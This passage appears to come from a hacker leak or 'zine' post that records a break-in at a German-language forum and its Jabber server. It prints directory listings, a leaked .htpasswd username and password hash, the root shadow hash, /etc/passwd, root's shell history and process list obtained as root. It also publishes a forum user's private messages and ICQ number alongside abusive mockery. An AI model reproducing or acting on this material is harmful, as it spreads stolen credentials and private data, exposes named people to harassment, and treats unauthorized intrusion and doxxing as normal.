3 swissfaking swissfaking 4096 Mar 26 2010 customgroupicons +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 customprofilepics +-rw-r--r-- 1 swissfaking swissfaking 47736 Mar 26 2010 editpost.php +-rw-r--r-- 1 swissfaking swissfaking 29479 Mar 26 2010 external.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Jan 4 22:35 falloutadm +-rw-r--r-- 1 swissfaking swissfaking 9765 Mar 26 2010 faq2.phpoldold +-rw-r--r-- 1 swissfaking swissfaking 4286 Mar 26 2010 favicon.gif +-rw-r--r-- 1 swissfaking swissfaking 35640 Mar 26 2010 forumdisplay.php +-rw-r--r-- 1 swissfaking swissfaking 39820 Mar 26 2010 global.php +-rw-r--r-- 1 swissfaking swissfaking 137864 Mar 26 2010 group.php +-rw-r--r-- 1 swissfaking swissfaking 24898 Mar 26 2010 group_inlinemod.php +-rw-r--r-- 1 swissfaking swissfaking 10816 Mar 26 2010 groupsubscription.php +-rw-r--r-- 1 swissfaking swissfaking 9026 Mar 26 2010 image.php +drwxr-xr-x 21 swissfaking swissfaking 4096 Oct 31 22:09 images +drwxr-xr-x 2 swissfaking swissfaking 4096 Apr 9 2010 img +drwxr-xr-x 7 swissfaking swissfaking 12288 Jan 2 22:12 includes +-rw-r--r-- 1 swissfaking swissfaking 19575 Nov 27 04:26 index.php +drwxr-xr-x 6 swissfaking swissfaking 4096 Mar 26 2010 infernoshout +-rw-r--r-- 1 swissfaking swissfaking 11083 Mar 26 2010 infernoshout.php +-rw-r--r-- 1 swissfaking swissfaking 43808 Mar 26 2010 infraction.php +-rw-r--r-- 1 swissfaking swissfaking 182738 Mar 26 2010 inlinemod.php +-rw-r--r-- 1 swissfaking swissfaking 5850 Mar 26 2010 itrader.php +-rw-r--r-- 1 swissfaking swissfaking 11784 Mar 26 2010 itrader_detail.php +-rw-r--r-- 1 swissfaking swissfaking 11841 Mar 26 2010 itrader_feedback.php +-rw-r--r-- 1 swissfaking swissfaking 1401 Mar 26 2010 itrader_global.php +-rw-r--r-- 1 swissfaking swissfaking 19557 Mar 26 2010 itrader_main.php +-rw-r--r-- 1 swissfaking swissfaking 3570 Mar 26 2010 itrader_report.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Oct 10 19:11 jabber +-rw-r--r-- 1 swissfaking swissfaking 10321 Mar 26 2010 joinrequests.php +-rw-r--r-- 1 swissfaking swissfaking 10201 Mar 26 2010 login.php +-rw-r--r-- 1 swissfaking swissfaking 17048 Mar 26 2010 member.php +-rw-r--r-- 1 swissfaking swissfaking 15910 Mar 26 2010 member_inlinemod.php +-rw-r--r-- 1 swissfaking swissfaking 35880 Mar 26 2010 memberlist.php +-rw-r--r-- 1 swissfaking swissfaking 23846 Mar 26 2010 misc.php +-rw-r--r-- 1 swissfaking swissfaking 63310 Mar 26 2010 moderation.php +-rw-r--r-- 1 swissfaking swissfaking 6735 Mar 26 2010 moderator.php +-rw-r--r-- 1 swissfaking swissfaking 18456 Mar 26 2010 newattachment.php +-rw-r--r-- 1 swissfaking swissfaking 37083 Mar 26 2010 newreply.php +-rw-r--r-- 1 swissfaking swissfaking 18890 Mar 26 2010 newthread.php +-rw-r--r-- 1 swissfaking swissfaking 19583 Mar 26 2010 online.php +-rw-r--r-- 1 swissfaking swissfaking 7675 Mar 26 2010 payment_gateway.php +-rw-r--r-- 1 swissfaking swissfaking 11889 Mar 26 2010 payments.php +-rw-r--r-- 1 swissfaking swissfaking 7868 Mar 26 2010 picture.php +-rw-r--r-- 1 swissfaking swissfaking 22022 Mar 26 2010 picture_inlinemod.php +-rw-r--r-- 1 swissfaking swissfaking 25293 Mar 26 2010 picturecomment.php +drwxr-xr-x 2 swissfaking swissfaking 4096 May 19 2010 plugins +-rw-r--r-- 1 swissfaking swissfaking 27394 Mar 26 2010 poll.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 polls +-rw-r--r-- 1 swissfaking swissfaking 9491 Mar 26 2010 posthistory.php +-rw-r--r-- 1 swissfaking swissfaking 75622 Jul 17 20:16 postings.php +-rw-r--r-- 1 swissfaking swissfaking 6573 Mar 26 2010 printthread.php +-rw-r--r-- 1 swissfaking swissfaking 70727 Mar 26 2010 private.php +-rw-r--r-- 1 swissfaking swissfaking 152315 Mar 26 2010 profile.php +-rw-r--r-- 1 swissfaking swissfaking 555 Mar 26 2010 quickpreview.php +-rw-r--r-- 1 swissfaking swissfaking 39730 Mar 26 2010 register.php +-rw-r--r-- 1 swissfaking swissfaking 5667 Mar 26 2010 report.php +-rw-r--r-- 1 swissfaking swissfaking 13699 Mar 26 2010 reputation.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Nov 30 01:07 runnerzzzmod +-rw-r--r-- 1 swissfaking swissfaking 128640 May 6 2010 search.php +-rw-r--r-- 1 swissfaking swissfaking 20673 Mar 26 2010 sendmessage.php +-rw-r--r-- 1 swissfaking swissfaking 9988 Mar 26 2010 showgroups.php +-rw-r--r-- 1 swissfaking swissfaking 11353 Mar 26 2010 showpost.php +-rw-r--r-- 1 swissfaking swissfaking 73449 Mar 26 2010 showthread.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 signaturepics +-rw-r--r-- 1 swissfaking swissfaking 47803 Mar 26 2010 statistics__blocked_.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 statsmod___blocked_ +-rw-r--r-- 1 swissfaking swissfaking 32827 Mar 26 2010 subscription.php +-rw-r--r-- 1 swissfaking swissfaking 2091 Mar 26 2010 swisss.php +-rw-r--r-- 1 swissfaking swissfaking 13344 Mar 26 2010 tags.php +-rw-r--r-- 1 swissfaking swissfaking 8671 Mar 26 2010 threadrate.php +-rw-r--r-- 1 swissfaking swissfaking 12394 Mar 26 2010 threadtag.php +-rw-r--r-- 1 swissfaking swissfaking 34494 Mar 26 2010 usercp.php +-rw-r--r-- 1 swissfaking swissfaking 19077 Mar 26 2010 usernote.php +-rw-r--r-- 1 swissfaking swissfaking 27339 Mar 26 2010 visitormessage.php +drwxr-xr-x 5 swissfaking swissfaking 4096 Mar 26 2010 vmoods +drwxr-xr-x 13 swissfaking swissfaking 4096 Mar 26 2010 zseries_red +drwxr-xr-x 3 swissfaking swissfaking 4096 Jan 3 22:52 zxpwmvprzzugrzms + +# cat includes/config.php + +require valid-user + + +1:$1$VuIT5qnw$SD8.UzvKgXUwoufPSiaR/. + +# cd zxpwmvprzzugrzms && ls -la +total 2068 +drwxr-xr-x 3 swissfaking swissfaking 4096 Jan 3 22:52 . +drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 .. +-rw-r--r-- 1 swissfaking swissfaking 495 Jan 3 22:38 .htaccess +-rw-r--r-- 1 swissfaking swissfaking 26 Jan 3 22:38 .htpasswd +-rw-r--r-- 1 swissfaking swissfaking 19317 Jan 3 22:52 accessmask.php +-rw-r--r-- 1 swissfaking swissfaking 39558 Jan 3 22:52 admincalendar.php +-rw-r--r-- 1 swissfaking swissfaking 49620 Jan 3 22:52 admininfraction.php +-rw-r--r-- 1 swissfaking swissfaking 19126 Jan 3 22:52 adminlog.php +-rw-r--r-- 1 swissfaking swissfaking 8125 Jan 3 22:52 adminpermissions.php +-rw-r--r-- 1 swissfaking swissfaking 25492 Jan 3 22:52 adminreputation.php +-rw-r--r-- 1 swissfaking swissfaking 32824 Jan 3 22:52 album.php +-rw-r--r-- 1 swissfaking swissfaking 12980 Jan 3 22:52 announcement.php +-rw-r--r-- 1 swissfaking swissfaking 54994 Jan 3 22:52 attachment.php +-rw-r--r-- 1 swissfaking swissfaking 12488 Jan 3 22:52 attachmentpermission.php +-rw-r--r-- 1 swissfaking swissfaking 19331 Jan 3 22:52 avatar.php +-rw-r--r-- 1 swissfaking swissfaking 16437 Jan 3 22:52 bbcode.php +-rw-r--r-- 1 swissfaking swissfaking 14758 Jan 3 22:51 bookmarksite.php +-rw-r--r-- 1 swissfaking swissfaking 12059 Jan 3 22:51 calendarpermission.php +-rw-r--r-- 1 swissfaking swissfaking 43 Jan 3 22:51 clear.gif +drwxr-xr-x 2 swissfaking swissfaking 4096 Jan 3 22:53 control_examples +-rw-r--r-- 1 swissfaking swissfaking 65076 Jan 3 22:51 credits_admin.php +-rw-r--r-- 1 swissfaking swissfaking 24025 Jan 3 22:51 cronadmin.php +-rw-r--r-- 1 swissfaking swissfaking 10710 Jan 3 22:51 cronlog.php +-rw-r--r-- 1 swissfaking swissfaking 34063 Jan 3 22:51 css.php +-rw-r--r-- 1 swissfaking swissfaking 21795 Jan 3 22:51 diagnostic.php +-rw-r--r-- 1 swissfaking swissfaking 11724 Jan 3 22:51 email.php +-rw-r--r-- 1 swissfaking swissfaking 17458 Jan 3 22:51 faq.php +-rw-r--r-- 1 swissfaking swissfaking 12143 Jan 3 22:51 force_read_thread.php +-rw-r--r-- 1 swissfaking swissfaking 30113 Jan 3 22:51 forum.php +-rw-r--r-- 1 swissfaking swissfaking 30039 Jan 3 22:51 forumpermission.php +-rw-r--r-- 1 swissfaking swissfaking 7692 Jan 3 22:51 global.php +-rw-r--r-- 1 swissfaking swissfaking 25898 Jan 3 22:51 help.php +-rw-r--r-- 1 swissfaking swissfaking 51895 Jan 3 22:51 image.php +-rw-r--r-- 1 swissfaking swissfaking 45450 Jan 3 22:51 index.php +-rw-r--r-- 1 swissfaking swissfaking 8756 Jan 3 22:51 infernoshoutlog.php +-rw-r--r-- 1 swissfaking swissfaking 3251 Jan 3 22:50 itrader_misc.php +-rw-r--r-- 1 swissfaking swissfaking 37384 Jan 3 22:50 language.php +-rw-r--r-- 1 swissfaking swissfaking 51623 Jan 3 22:50 mgc_cb_evo.php +-rw-r--r-- 1 swissfaking swissfaking 69534 Jan 3 22:50 misc.php +-rw-r--r-- 1 swissfaking swissfaking 34140 Jan 3 22:50 moderator.php +-rw-r--r-- 1 swissfaking swissfaking 16889 Jan 3 22:50 modlog.php +-rw-r--r-- 1 swissfaking swissfaking 1837 Jan 3 22:50 newsproxy.php +-rw-r--r-- 1 swissfaking swissfaking 30631 Jan 3 22:50 notice.php +-rw-r--r-- 1 swissfaking swissfaking 43202 Jan 3 22:50 options.php +-rw-r--r-- 1 swissfaking swissfaking 12026 Jan 3 22:50 passwordcheck.php +-rw-r--r-- 1 swissfaking swissfaking 62644 Jan 3 22:50 phrase.php +-rw-r--r-- 1 swissfaking swissfaking 85854 Jan 3 22:50 plugin.php +-rw-r--r-- 1 swissfaking swissfaking 33055 Jan 3 22:50 prefix.php +-rw-r--r-- 1 swissfaking swissfaking 49757 Jan 3 22:50 profilefield.php +-rw-r--r-- 1 swissfaking swissfaking 11300 Jan 3 22:49 ranks.php +-rw-r--r-- 1 swissfaking swissfaking 5696 Jan 3 22:49 read_pms_deu.php +-rw-r--r-- 1 swissfaking swissfaking 15668 Jan 3 22:49 replacement.php +-rw-r--r-- 1 swissfaking swissfaking 11004 Jan 3 22:49 resources.php +-rw-r--r-- 1 swissfaking swissfaking 30488 Jan 3 22:49 ripper.php +-rw-r--r-- 1 swissfaking swissfaking 20657 Jan 3 22:49 rssposter.php +-rw-r--r-- 1 swissfaking swissfaking 13164 Jan 3 22:49 socialgroup_icon.php +-rw-r--r-- 1 swissfaking swissfaking 17538 Jan 3 22:49 socialgroups.php +-rw-r--r-- 1 swissfaking swissfaking 11215 Jan 3 22:49 stamp.php +-rw-r--r-- 1 swissfaking swissfaking 8623 Jan 3 22:49 stats.php +-rw-r--r-- 1 swissfaking swissfaking 8170 Jan 3 22:49 subscriptionpermission.php +-rw-r--r-- 1 swissfaking swissfaking 62261 Jan 3 22:49 subscriptions.php +-rw-r--r-- 1 swissfaking swissfaking 91677 Jan 3 22:49 template.php +-rw-r--r-- 1 swissfaking swissfaking 3911 Jan 3 22:49 textarea.php +-rw-r--r-- 1 swissfaking swissfaking 58666 Jan 3 22:49 thread.php +-rw-r--r-- 1 swissfaking swissfaking 8300 Jan 3 22:49 threadfields_admin.php +-rw-r--r-- 1 swissfaking swissfaking 95176 Jan 3 22:48 user.php +-rw-r--r-- 1 swissfaking swissfaking 56136 Jan 3 22:48 usergroup.php +-rw-r--r-- 1 swissfaking swissfaking 7272 Jan 3 22:48 usertitle.php +-rw-r--r-- 1 swissfaking swissfaking 75581 Jan 3 22:48 usertools.php +-rw-r--r-- 1 swissfaking swissfaking 18753 Jan 3 22:48 verify.php + +# cat .htpasswd +Fickmaus:9Zistd9IicJdY + +# cd ../jabber && ls -la +total 684 +drwxr-xr-x 2 swissfaking swissfaking 4096 Oct 10 19:11 . +drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 .. +-rw-r--r-- 1 swissfaking swissfaking 7948 Oct 10 18:54 AC_OETags.js +-rw-r--r-- 1 swissfaking swissfaking 629979 Oct 10 18:56 SparkWeb.swf +-rw-r--r-- 1 swissfaking swissfaking 4286 Oct 10 19:10 favicon.gif +-rw-r--r-- 1 swissfaking swissfaking 3638 Oct 10 18:54 favicon.ico +-rw-r--r-- 1 swissfaking swissfaking 1272 Oct 10 18:54 history.htm +-rw-r--r-- 1 swissfaking swissfaking 1292 Oct 10 18:54 history.js +-rw-r--r-- 1 swissfaking swissfaking 2656 Oct 10 18:54 history.swf +-rw-r--r-- 1 swissfaking swissfaking 15260 Oct 10 19:11 jabber.html +-rw-r--r-- 1 swissfaking swissfaking 2518 Oct 10 18:55 osxmousewheel.js +-rw-r--r-- 1 swissfaking swissfaking 657 Oct 10 18:55 playerProductInstall.swf + + +While looking through the forums we came across someone special... +________________________________________________________________________ +From fred777 to Fickmaus; Subject: Mod? + +Hi Ficki, ich freu mich, dass swiss wieder online ist und wollte fragen +ob ihr Unterstützung benötigt, bzw. ich würde gerne meine Hilfe anbieten.. + +Designen, moderieren etc. +Als Moderator würde ich wenn dann gerne die Sections: +Coding und Hacking/Cracking moderieren. Vielleicht braucht ihr aber auch +gar keine, ich dachte nur für einen guten Start ist das nicht schlecht. + +Selbstverständlich werde ich auch noch einiges posten + +Falls ihr mich nicht kennt, schaut mal auf +fred777.5x.to, free-hack, back2hack etc. vorbei ;) + +Danke +________________________________________________________________________ +From fred777 to SzeneCrasher; Subject: Hi Crasher + +Jo da die ersten Mods eingestellt werden wollte ich mal fragen bezüglich +der Hacking/Coding Section. +Ich würde die gerne moderieren und euch helfen. +Das ich kein Mist mache solltest du wissen, bin schon lange im Netz +unterwegs, FH,Back2hack etc.. + +Solltest du Fragen haben: ICQ 390271540 + +Vielleicht wird das ja was, danke schonmal +________________________________________________________________________ +From fred777 to erdnuss; Subject: Mod? + +Ja, da nun ja auch Sections geändert worden sind und es voller wird, +wollte ich nun bei den Admins fragen wie es so ist mit den Moderatoren +in der Security/Hacking Sections. +Habe auch schon letztens Ficki gefragt, der meinte abwarten... + +Es müssten z.B. aktuell einige Beiträge verschoben werden. Ich würde +gerne Moderator in dieser Section werden, darum die Frage. +Kennen könnte man mich von Back2hack und Freehack ;) +________________________________________________________________________ +From fred777 to SzeneCrasher; Subject: Frage + +Ich wollte mich nochmal erkundigen, wie es mit den Moderatoren aussieht, +Swiss ist ja nun voller und größer geworden. Ich kann auch nochmal eine +komplette Bewerbung abschicken wenn ihr welche sucht. +________________________________________________________________________ +From fred777 to SzeneCrasher; Subject: Aussichten + +Ja ich wollte mal fragen, wie es so steht, bezüglich der +Moderatorenanfrage und was die anderem Teamies gesagt haben.. + +Gruß _fred_ +________________________________________________________________________ + + +FUCK. Are you serious? We knew you're lame. We knew you're dying for +fame and we even knew you suck cock but we were absolutely not aware +of the extent this has come to. Are you really that desperate to +moderate a fucking preschool that you start begging for it only days +after your registration? Damnit fred, you're pretty rundown. + + + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| From fred777 to Fickmaus; Subject: Jabber | +| Ja ich hätte gerne einen Account, habe noch keinen. | +| Name: fred777 | +|____________________________________________________________________| + +Right on cue, chap! +Not only is the board full of criminal kids, but they also provide a +jabber server for their users. While at it, we decided to tap in and +see what they're doing there, we also got some loggin going and +prepared a nice collection of their messages as well as a full backup +for you. + + +# uname -a +Linux jabbersw 2.6.18-194.3.1.el5.028stab069.6 #1 SMP Wed May 26 18:31:05 MSD 2010 i686 GNU/Linux + +# id +uid=0(root) gid=0(root) + +# cat /etc/passwd /etc/shadow +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +bind:x:101:104::/var/cache/bind:/bin/false +fetchmail:x:102:65534::/var/lib/fetchmail:/bin/false +sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin +stunnel4:x:104:106::/var/run/stunnel4:/bin/false +smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +jabber:x:107:65534::/var/run/jabber:/bin/false +messagebus:x:108:109::/var/run/dbus:/bin/false +avahi:x:109:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false +postgres:x:110:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash +identd:x:111:65534::/var/run/identd:/bin/false +openfire:x:112:113:Openfire XMPP server,,,:/var/lib/openfire:/bin/false +root:$1$58.RHhjn$9z8MH2daUFLKAJclEq7A8.:14818:0:99999:7::: +daemon:*:14725:0:99999:7::: +bin:*:14725:0:99999:7::: +sys:*:14725:0:99999:7::: +sync:*:14725:0:99999:7::: +games:*:14725:0:99999:7::: +man:*:14725:0:99999:7::: +lp:*:14725:0:99999:7::: +mail:*:14725:0:99999:7::: +news:*:14725:0:99999:7::: +uucp:*:14725:0:99999:7::: +proxy:*:14725:0:99999:7::: +www-data:*:14725:0:99999:7::: +backup:*:14725:0:99999:7::: +list:*:14725:0:99999:7::: +irc:*:14725:0:99999:7::: +gnats:*:14725:0:99999:7::: +nobody:*:14725:0:99999:7::: +libuuid:!:14725:0:99999:7::: +bind:*:14725:0:99999:7::: +fetchmail:*:14725:0:99999:7::: +sshd:*:14725:0:99999:7::: +stunnel4:!:14725:0:99999:7::: +smmta:*:14725:0:99999:7::: +smmsp:*:14725:0:99999:7::: +jabber:*:14817:0:99999:7::: +messagebus:*:14829:0:99999:7::: +avahi:*:14829:0:99999:7::: +postgres:*:14829:0:99999:7::: +identd:*:14829:0:99999:7::: +openfire:*:14829:0:99999:7::: + +# cd /root && ls -la +total 36 +drwxr-xr-x 3 root root 4096 Jan 3 01:45 . +drwxr-xr-x 20 root root 4096 Dec 30 13:30 .. +-rw------- 1 root root 5215 Sep 27 21:42 .bash_history +-rw-r--r-- 1 root root 412 Dec 16 2004 .bashrc +-rw-r--r-- 1 root root 140 Nov 19 2007 .profile +drwx------ 2 root root 4096 Jan 3 00:35 .ssh +-rw------- 1 root root 6186 Jan 3 01:45 .viminfo + +# cat .bash_history +cd etc +ls -l +cd jabber +ls -l +vi jabber.xml +ls -l +vi jabber.cfg +cd .. +ls -l +cd .. +ls -l +cd jabberd/jabber-1.4.2a +ls -l +cd var +cd run +ls -l +cd jabber +ls -l +ls -l +cd .. +ls -l +cd etc +cd jabber +ls -l +Wget http://ports.internal.vlink.ru/distfiles/mu-conference-0.6.0.tar.gz +wget http://ports.internal.vlink.ru/distfiles/mu-conference-0.6.0.tar.gz +ls -l +gzip -d mu-conference-0.6.0.tar.gz +ls -l +tar -xvf mu-conference-0.6.0.tar +ls -l +cd mu-conference-0.6.0 +ls -l +make +Makefile +ls -l +ps aux +cd src +ls -l +cd .. +ls -l +cd scripts +ls -l +cd .. +ls -l +cd ./ +ls -l +cd .. +ls -l +vi jabber.xml +cd mu-conference-0.6.0 +ls -l +make +cd src +ls -l +make +cd .. +cd .. +cd .. +cd .. +ls -l +cd /etc/jabber +ls -l +del mu-conference-0.6.0.tar +rmdir mu-conference-0.6.0 + mu-conference-0.6.0 +rmdir -p mu-conference-0.6.0 +rmdir --ignore-fail-on-non-empty mu-conference-0.6.0 +ls -l +rmdir --help +rmdir --ignore mu-conference-0.6.0 +ls -l +rmdir -i mu-conference-0.6.0 +rm mu-conference-0.6.0.tar +ls -l +rm mu-conference-0.6.0 +rm -r mu-conference-0.6.0 +ls -l +cd .. +cd .. +cd .. +ls -l +wget http://download.gna.org/mu-conference/mu-conference_0.8.tar.gz +ls -l +gzip -d mu-conference_0.8.tar.gz +ls -l +tar -xvf mu-conference_0.8.tar +ls -l +cd mu-conference_0.8 +ls -l +make +ls -l +cd scr +ls -l +cd src +ls -l +make +ls -l +cd .. +cd .. +ls -l +rm mu-conference_0.8.tar +rm -r mu-conference_0.8 +ls -l +wget http://download.jabberd.org/jabberd14/jabberd-1.4.4.tar.gz +gzip -d jabberd-1.4.4.tar.gz +tar -xvf gzip -d jabberd-1.4.4.tar +ls -l +tar -xvf jabberd-1.4.4.tar +ls -l +cd jabberd-1.4.4 +ls -l +./configure +make +ls -l +cd .. +ls -l +rm jabberd-1.4.4.tar +rm -r jabberd-1.4.4 +ls -l +cd etc +cd jabber +ls -l +vi jabber.d +cd jabber.d +ls -l +cd .. +cd .. +cd .. +ls -l +cd var +cd run +ls -l +cd jabber +ls -l +wget http://ftp.riken.go.jp/pub/FreeBSD/distfiles/jabber/jud-0.4.tar.gz +ls -l +gzip -d jud-0.4.tar.gz +tar -xvf jud-0.4.tar +ls -l +cd jud-0.4 +ls -l +make +cd .. +ls -l +rm jud-0.4.tar +rm -r jud-0.4 +ls -l +ls -l +cd .. +ls -l +cd var +cd run +cd jabber +ls -l +ps aux +cd .. +cd .. +ls -l +cd .. +ls -l +cd etc +ls -l +cd jabber +ls -l +vi jabber-muc.xml +ps aux +cd .. +cd .. +cd var +cd run +cd jabber +ls -l + su jabber +ls -l +ps aux +cd .. +cd .. +ls -l +cd etc +cd .. +ls -l +cd etc +cd jabber +ls -l +vi jabber.xml +cd .. +ls -l +cd jabber +ls -l +cd .. +cd init.d +ls -l +cd jabber +cd .. +ls -l +cd .. +cd usr +cd lib +ls -l +cd jabber +ls -l +cd mu-conference +ls -l +cd .. +cd .. +cd.. +cd .. +cd .. +cd etc +cd jabber +ls -l +vi jabber.xml +vi jabber-muc.xml +jabber-muc +cd .. +ls -l +cd default +ls -l +jabber-muc +cd jabber-muc +jabber-muc +cd jabber-muc +exec jabber-muc +cd .. +cd .. +cd var +cd spool +ls -l +cd .. +cd .. +ls -l +cd etc +cd jabber +ls -l +vi jabber-muc.xml +ps aux +cd .. +ls -l +cd etc +cd jabber +ls -l +vi jabber-muc.xml +vi jabber-jud.xml +vi jabber.xml +cd .. +cd etc +cd jabber +ls -l +vi jabber.xml +ps aux +cd .. +cd .. +cd usr +ls -l +cd lib +ls -l +cd jabber +ls -l +cd mu-conference +ls -l +cd .. +cd .. +cd .. +cd .. +cd etc +ls -l +cd jabber +ls -l +vi +vi jabber.xml +ps aux +kill 26124 +ls -l +ps aux +cd .. +cd .. +cd usr +cd sbin +ls -l +jabberd -h jabber-swissfaking.net +cd .. +cd .. +cd etc +ls -l +cd jabber +ls -l +vi jabber.xml +cd .. +cd .. +cd usr +cd sbin +jabberd -h jabber-swissfaking.net +ps aux +netstat -tlun +cd .. +cd cd var +ls -l +cd var +cd run +cd jabber +ls -l +cd .. +cd .. +ls -l +cd .. +ls -l +cd usr +cd sbin +ls -l +jabber-muc +jabberd -much jabber-swissfaking.net +cd .. +cd etc +cd jabber +ls -l +vi jabber.xml +vi jabber.cfg +cd.. +cd .. +cd .. +cd var +cd lib +cd jabber +ls -l +cd .. +cd .. +cd var +cd var +cd .. +cd var +cd run +cd jabber +ls -l +ps aux +kill 3184 +jabberd -h jabber-swissfaking.net +cd .. +ls-l +ls -l +cd etc +cd jabber +ls -l +vi jabber-muc.xml +vi jabber-jud.xml +cd .. +default +cd default +vi jabber-muc +cd .. +cd jabber +ls -l +vi jabber.xml +netstat -tlun +cd .. +cd .. +cd var +cd run +cd jabber +ps aux +kill 18354 +jabberd -h jabber-swissfaking.net +cd.. +cd .. +cd etc +cd jabber +ls -l +cd jabber.d +ls -l +jabber-jud +jabber-jud -h +cd jabber-jud +jabber-jud +jabber-jud -h jabber-swissfaking.net +cd .. +cd . +cd .. +cd .. +cd var +cd spool +ls -l +cd .. +cd .. +ps aux +cd /usr/lib/jvm/ja +cd usr +cd .. +cd usr +cd lib +cd ... +cd .. +cd .. +cd etc +ls -l +cd init.d +ls -l +openfire restart +openfire restart +cd openfir +openfire stop +sudo /etc/init.d/openfire restart +ls -l +cd .. +cd /usr/share/openfire +ls -l +cd lib +ls -l +ps aux +cd /usr/sbin/jabberd +cd /usr/sbin/jabberd +cd /usr/sbin/ +ls -l +ps aux +kill 7313 +ps aux +sudo /etc/init.d/openfire restart +cd .. +ps aux +kill 13651 +sudo /etc/init.d/openfire restart +ps aux +ps aux +ps aux +ps aux +ps aux +ps aux +sudo /etc/init.d/openfire start +ps aux +cd .. +ls -l +ps aux +sudo /etc/init.d/openfire restart +ps aux +ps aux +ps aux +kill 13754 +ps aux +ps aux +sudo /etc/init.d/openfire restart +ps aux +kill 26588 +sudo /etc/init.d/openfire restart +cd .. +ls - +ls -l +cd etc +ls -l +cd jabber +ls -l +del +rm jabber.xml +rm jabber.d +rm jabber.cfg +rm jabber-muc.xml +rm jabber-jud.xml +ls -l +cd jabber.d +ls -l +rm jabber-jud +rm jabber-muc +ls -l +cd .. +ls -l +rmdir jabber.d +ls -l +cd .. +ls -l +cd .. +cd var +cd run +ls -l +rm jabber +cd jabber +ls -l +cd .. +ls -l +cd .. +ls -l +cd +ls -l +cd .. +ls -l +ps aux +cd.. +cd .. +ls -l +ps aux +sudo /etc/init.d/openfire restart +cd .. +ps-aux +ps aux +sudo /etc/init.d/openfire restart +ps aux +cd .. +ps aux +sudo /etc/init.d/openfire restart +cd .. +ps aux +sudo /etc/init.d/openfire restart +sensor + +# ps aux +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.0 0.1 1980 688 ? Ss 2010 0:05 init [2] +openfire 1703 0.0 25.0 342352 131124 ? Sl Jan03 4:30 /usr/lib/jvm/java-6-sun/bin/java -server -DopenfireHome=/usr/share/openfire -Dopenfire.lib.dir=/usr/share/openfire/lib -classpath /usr/share/openfire/lib/startup.jar -jar /us +root 3392 0.0 0.1 1692 616 ? Ss 2010 0:00 /sbin/syslogd +108 3399 0.0 0.1 2480 860 ? Ss 2010 0:00 /usr/bin/dbus-daemon --system +avahi 3410 0.0 0.2 2876 1432 ? Ss 2010 0:00 avahi-daemon: running [jabbersw.local] +avahi 3411 0.0 0.0 2744 452 ? Ss 2010 0:00 avahi-daemon: chroot helper +root 3417 0.0 0.1 5272 1032 ? Ss 2010 0:00 /usr/sbin/sshd +www-data 3632 0.0 1.1 38240 6232 ? S Jan02 0:00 /usr/sbin/apache2 -k start +postgres 3750 0.0 0.9 40668 4960 ? S 2010 0:01 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf +postgres 5193 0.0 1.2 40668 6540 ? Ss 2010 0:04 postgres: writer process +postgres 5194 0.0 0.2 40668 1288 ? Ss 2010 0:02 postgres: wal writer process +postgres 5195 0.0 0.2 40808 1424 ? Ss 2010 0:01 postgres: autovacuum launcher process +postgres 5196 0.0 0.2 11988 1192 ? Ss 2010 0:05 postgres: stats collector process +root 5230 0.0 0.1 108572 940 ? Ssl 2010 0:00 /usr/sbin/nscd +root 5262 0.0 0.1 2912 820 ? Ss 2010 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6 +root 5279 0.0 0.1 2036 688 ? Ss 2010 0:00 /usr/sbin/cron +root 5430 0.0 2.3 37740 12556 ? Ss 2010 0:00 /usr/sbin/apache2 -k start +postgres 7792 0.0 1.2 41992 6744 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43823) idle +postgres 7801 0.0 1.1 41916 6044 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43824) idle +postgres 7802 0.0 1.2 41980 6300 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43825) idle +postgres 7803 0.0 1.2 41976 6296 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43826) idle +postgres 13420 0.0 1.2 41988 6720 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43907) idle +www-data 17911 0.0 1.1 38236 6220 ? S Jan03 0:00 /usr/sbin/apache2 -k start +root 22036 0.0 0.1 2296 776 pts/0 R+ 07:10 0:00 ps aux +www-data 26577 0.0 1.1 38240 6236 ? S Jan02 0:00 /usr/sbin/apache2 -k start +root 30105 0.0 0.2 2760 1408 pts/0 Ss 